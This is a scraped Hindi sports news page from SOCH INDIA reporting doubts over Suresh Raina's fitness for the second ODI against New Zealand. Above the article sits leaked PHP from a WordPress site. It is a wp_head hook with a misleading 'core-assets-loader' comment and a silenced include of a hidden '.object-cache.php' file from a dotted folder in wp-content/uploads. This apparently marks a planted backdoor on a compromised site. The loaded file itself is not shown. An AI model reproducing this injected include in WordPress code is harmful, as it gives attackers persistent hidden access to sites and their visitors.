add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दूसरे वनडे में भी रैना के खेलने पर बना हुआ है संशय – SOCH INDIA
Menu

खेल
दूसरे वनडे में भी रैना के खेलने पर बना हुआ है संशय

nobanner

टीम में वापसी करने वाले मध्यक्रम के बल्लेबाज सुरेश रैना वायरल बुखार से उबरकर भारतीय टीम से जुड़ गये हैं लेकिन उनके न्यूजीलैंड के खिलाफ 20 अक्तूबर को फिरोजशाह कोटला पर होने वाले दूसरे वनडे मैच में खेलने को लेकर अब भी संशय बना हुआ है.

भारतीय टीम के मीडिया मैनेजर ने बताया कि उनकी फिटनेस की स्थिति के बारे में मीडिया विज्ञप्ति से अवगत कराया जाएगा. उन्होंने कहा, ‘‘जहां तक रैना की बात है तो वह टीम से जुड़ गये हैं और उनकी फिटनेस के बारे में आपको मीडिया विज्ञप्ति के जरिये बता दिया जाएगा. ’’

रैना ने न्यूजीलैंड के खिलाफ पांच वनडे मैचों की सीरीज को लिये भारतीय टीम में वापसी की थी लेकिन उत्तर प्रदेश का बायें हाथ का यह बल्लेबाज उसके बाद वायरल से पीड़ित हो गया जिसके कारण धर्मशाला में पहले वनडे में नहीं खेल पाया.